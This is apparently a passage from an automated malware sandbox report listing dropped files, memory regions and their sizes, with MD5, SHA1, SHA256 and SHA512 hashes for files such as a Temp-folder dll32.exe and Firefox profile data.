                                                                                      • C:\Users\Admin\AppData\Local\Temp\dll32.exe

                                                                                        Filesize

                                                                                        5.7MB

                                                                                        MD5

                                                                                        ffb5c5f8bab4598fada3bbf92d02d66d

                                                                                        SHA1

                                                                                        ae8096c1f160c97874179ea878a61f69bfb9941a

                                                                                        SHA256

                                                                                        f3aa764be17f1a197f94b949cfd88f99c2d67e9fec1f53046ef1b6189f594da1

                                                                                        SHA512

                                                                                        902e8a95b964ef3a48504dcdb3c4f0615212eb942476ec26b88e02a39cbaaf866f3fcbe5cd4374342b80aae9a7e17092a28dbe1d53630493a0b0cee8152a4ccf

                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\43B5V5YTPWHWUMUZ0WUF.temp

                                                                                        Filesize

                                                                                        7KB

                                                                                        MD5

                                                                                        cf4755a0b4f6a476ed9ec4b954c9a668

                                                                                        SHA1

                                                                                        44414be19cbd0d220bc54cbc9f3c516d8e162f67

                                                                                        SHA256

                                                                                        4ac36f8987514199eaa9d6326e7d24c5244143cf28f519fc6b728e8c0b550317

                                                                                        SHA512

                                                                                        142a20dee3b3cfe332f5bd8546a92ae09a30876becf71711c0da87f99f3553279af805e3a932c92860090134e858b7f0913ee6a33fb19f8f2227fb3dc9f06f35

                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                        Filesize

                                                                                        7KB

                                                                                        MD5

                                                                                        89cd609850b8304c30bb7f3b071b578d

                                                                                        SHA1

                                                                                        ea4fc4c31260c1f02b9cef4362e3fc83f81b4d44

                                                                                        SHA256

                                                                                        bee49cba0b3b27dac3fcbb3bf90a22cba22cb74666bc25bdf0cff6d8aa5cf1ca

                                                                                        SHA512

                                                                                        e92c352ac176d870682bd33fb2da777cac6ddf99f0e8b7e443ef62dab2ec926624ba9637ce24eb80b54b7b03c9598e9a7de0ab6145c0c5c71b59c2d62902d4ad

                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db\data.safe.bin

                                                                                        Filesize

                                                                                        2KB

                                                                                        MD5

                                                                                        0e350366847af23c037d507419347feb

                                                                                        SHA1

                                                                                        8242c0c6bf6fec739a8b661b19a8ec5070cad88a

                                                                                        SHA256

                                                                                        83bf3279cf673600c1f59738025c1b0df03d1d6b23ea3c862d45002678f9f6da

                                                                                        SHA512

                                                                                        9a644db2d95dc246457d730fea4bae77747e157d4e10e31b15d923a82fc311222314f436f3eebfb85705625952ab1120b628346c88b99e2060ede52a8ff68ee8

                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings\839311e5-eba9-4042-a826-513f4a3fc6c3

                                                                                        Filesize

                                                                                        11KB

                                                                                        MD5

                                                                                        1ad9201a8833fb016ae755d4018a4179

                                                                                        SHA1

                                                                                        b102b32f53fba0ab96eafafa330eb76b0dd91354

                                                                                        SHA256

                                                                                        fedd9746a2a7ea5b579ba74257f0212c91187b4a2682bcf4ffb1dc18f6e977c2

                                                                                        SHA512

                                                                                        7cee043b490db22a3d661ad489563af099ff83f5dbf43bf0c1d7849de5862e6ec188b4f50ae04ba2b8856bca089d9b48b8f7e04cd04ac15bdd851abf6f5b3e23

                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings\9766b8d5-e705-461b-8bac-629cdcf25016

                                                                                        Filesize

                                                                                        745B

                                                                                        MD5

                                                                                        f76db41fdd1f9946258e2e6992df361a

                                                                                        SHA1

                                                                                        3464d8a8bce7ff518b1679f57883c3eec2b9339a

                                                                                        SHA256

                                                                                        3a8e915ea9e6046042a96067532aee25babc8f38f209072e48e27773f0885cab

                                                                                        SHA512

                                                                                        67b8a6776d52b3e02df089df984de1bea990c1f835b5f6757e2a7f670099fdf1aad90235d9c4adbfdd5ec076a93e652b640ae6338c13fc24bb897ea68f8288ef

                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\prefs-1.js

                                                                                        Filesize

                                                                                        6KB

                                                                                        MD5

                                                                                        fe533a1258d5d59ee178bd33212f0fa7

                                                                                        SHA1

                                                                                        7e5f66906b3b006deee8de6b0bb86070fe7597f9

                                                                                        SHA256

                                                                                        fff7b62bfa2b16b6df1582abd4889b223a76f3ba95f87c3bfc413188d9066644

                                                                                        SHA512

                                                                                        e3c2a074c68abc64039e4b41ab404835f9ba04ca2fb23d57cbe65c8a230fdf51da751b04cda5ecf19a8dd2a451f072d667c4c2d6aeb7123d64423c3f2779edcd

                                                                                      • \Users\Admin\AppData\Local\TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE

                                                                                        Filesize

                                                                                        1.8MB

                                                                                        MD5

                                                                                        09e00631d85ee0955f01a859559615f7

                                                                                        SHA1

                                                                                        fdfcd6e6a51797322526ad74f7cb0050c9d3e6b5

                                                                                        SHA256

                                                                                        f62908ccaf5e61f223f3e1a7a8d1351dd61327afdd5263b4084f58ad1bd45297

                                                                                        SHA512

                                                                                        079bafcff76d5ec1bc14bdb39b15de51e30e3cfb02a0155625ddb9207d908b07a04f12e39b6a0e6952129efc598697957c0d1b72beb1a52aa752ff9b14619e34

                                                                                      • \Users\Admin\AppData\Local\Temp\Costura\05A92EC28EDC5561548638CAA951F864\64\sqlite.interop.dll

                                                                                        Filesize

                                                                                        1.7MB

                                                                                        MD5

                                                                                        65ccd6ecb99899083d43f7c24eb8f869

                                                                                        SHA1

                                                                                        27037a9470cc5ed177c0b6688495f3a51996a023

                                                                                        SHA256

                                                                                        aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

                                                                                        SHA512

                                                                                        533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

                                                                                      • memory/880-256-0x00000000001B0000-0x0000000000BBA000-memory.dmp

                                                                                        Filesize

                                                                                        10.0MB

                                                                                      • memory/880-257-0x00000000001B0000-0x0000000000BBA000-memory.dmp

                                                                                        Filesize

                                                                                        10.0MB

                                                                                      • memory/880-262-0x00000000001B0000-0x0000000000BBA000-memory.dmp

                                                                                        Filesize

                                                                                        10.0MB

                                                                                      • memory/880-212-0x00000000001B0000-0x0000000000BBA000-memory.dmp

                                                                                        Filesize

                                                                                        10.0MB

                                                                                      • memory/1100-12-0x0000000006560000-0x0000000006A0F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/1100-13-0x0000000006560000-0x0000000006A0F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/1192-374-0x00000000012B0000-0x000000000176A000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/1464-83-0x00000000011A0000-0x000000000164F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/1464-84-0x00000000011A0000-0x000000000164F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/1524-184-0x0000000000270000-0x0000000001184000-memory.dmp

                                                                                        Filesize

                                                                                        15.1MB

                                                                                      • memory/1524-185-0x000000001C120000-0x000000001CC86000-memory.dmp

                                                                                        Filesize

                                                                                        11.4MB

                                                                                      • memory/1532-167-0x00000000010E0000-0x000000000158F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/1532-166-0x00000000010E0000-0x000000000158F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/1564-191-0x0000000000BC0000-0x0000000001176000-memory.dmp

                                                                                        Filesize

                                                                                        5.7MB

                                                                                      • memory/1616-50-0x0000000000150000-0x0000000000160000-memory.dmp

                                                                                        Filesize

                                                                                        64KB

                                                                                      • memory/1616-49-0x0000000001120000-0x0000000001132000-memory.dmp

                                                                                        Filesize

                                                                                        72KB

                                                                                      • memory/1700-244-0x0000000000400000-0x0000000000465000-memory.dmp

                                                                                        Filesize

                                                                                        404KB

                                                                                      • memory/1700-239-0x0000000000400000-0x0000000000465000-memory.dmp

                                                                                        Filesize

                                                                                        404KB

                                                                                      • memory/1700-235-0x0000000000400000-0x0000000000465000-memory.dmp

                                                                                        Filesize

                                                                                        404KB

                                                                                      • memory/1700-242-0x0000000000400000-0x0000000000465000-memory.dmp

                                                                                        Filesize

                                                                                        404KB

                                                                                      • memory/1700-241-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1700-237-0x0000000000400000-0x0000000000465000-memory.dmp

                                                                                        Filesize

                                                                                        404KB

                                                                                      • memory/1700-233-0x0000000000400000-0x0000000000465000-memory.dmp

                                                                                        Filesize

                                                                                        404KB

                                                                                      • memory/1700-231-0x0000000000400000-0x0000000000465000-memory.dmp

                                                                                        Filesize

                                                                                        404KB

                                                                                      • memory/2004-315-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                        Filesize

                                                                                        188KB

                                                                                      • memory/2144-214-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-51-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-213-0x0000000006890000-0x000000000729A000-memory.dmp

                                                                                        Filesize

                                                                                        10.0MB

                                                                                      • memory/2144-255-0x0000000006890000-0x000000000729A000-memory.dmp

                                                                                        Filesize

                                                                                        10.0MB

                                                                                      • memory/2144-211-0x0000000006890000-0x000000000729A000-memory.dmp

                                                                                        Filesize

                                                                                        10.0MB

                                                                                      • memory/2144-178-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-258-0x0000000006890000-0x000000000729A000-memory.dmp

                                                                                        Filesize

                                                                                        10.0MB

                                                                                      • memory/2144-598-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-33-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-170-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-265-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-35-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-169-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-286-0x0000000006890000-0x00000000074C5000-memory.dmp

                                                                                        Filesize

                                                                                        12.2MB

                                                                                      • memory/2144-168-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-36-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-307-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-416-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-312-0x0000000006890000-0x00000000074C5000-memory.dmp

                                                                                        Filesize

                                                                                        12.2MB

                                                                                      • memory/2144-380-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-124-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2144-154-0x00000000001A0000-0x000000000064F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2156-81-0x0000000006590000-0x0000000006A3F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2156-80-0x0000000006590000-0x0000000006A3F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2292-314-0x0000000001210000-0x0000000001E45000-memory.dmp

                                                                                        Filesize

                                                                                        12.2MB

                                                                                      • memory/2292-311-0x0000000001210000-0x0000000001E45000-memory.dmp

                                                                                        Filesize

                                                                                        12.2MB

                                                                                      • memory/2692-377-0x0000000000900000-0x0000000000C11000-memory.dmp

                                                                                        Filesize

                                                                                        3.1MB

                                                                                      • memory/2724-152-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

                                                                                        Filesize

                                                                                        2.9MB

                                                                                      • memory/2724-153-0x0000000000670000-0x0000000000678000-memory.dmp

                                                                                        Filesize

                                                                                        32KB

                                                                                      • memory/2808-261-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                        Filesize

                                                                                        188KB

                                                                                      • memory/2808-267-0x0000000010000000-0x000000001001C000-memory.dmp

                                                                                        Filesize

                                                                                        112KB

                                                                                      • memory/2808-259-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                        Filesize

                                                                                        188KB

                                                                                      • memory/2852-32-0x0000000007060000-0x000000000750F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2852-29-0x0000000007060000-0x000000000750F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2852-30-0x0000000000E70000-0x000000000131F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2852-395-0x0000000001380000-0x00000000019E6000-memory.dmp

                                                                                        Filesize

                                                                                        6.4MB

                                                                                      • memory/2852-15-0x0000000000E70000-0x000000000131F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/2916-228-0x0000000001180000-0x00000000011F8000-memory.dmp

                                                                                        Filesize

                                                                                        480KB

                                                                                      • memory/3008-163-0x0000000006580000-0x0000000006A2F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/3008-164-0x0000000006580000-0x0000000006A2F000-memory.dmp

                                                                                        Filesize

                                                                                        4.7MB

                                                                                      • memory/3356-571-0x00000000000F0000-0x000000000054E000-memory.dmp

                                                                                        Filesize

                                                                                        4.4MB

                                                                                      • memory/3356-572-0x00000000000F0000-0x000000000054E000-memory.dmp

                                                                                        Filesize

                                                                                        4.4MB

                                                                                      • memory/3736-594-0x0000000000AF0000-0x0000000001A04000-memory.dmp

                                                                                        Filesize

                                                                                        15.1MB

                                                                                      • memory/3828-595-0x0000000000180000-0x0000000000736000-memory.dmp

                                                                                        Filesize

                                                                                        5.7MB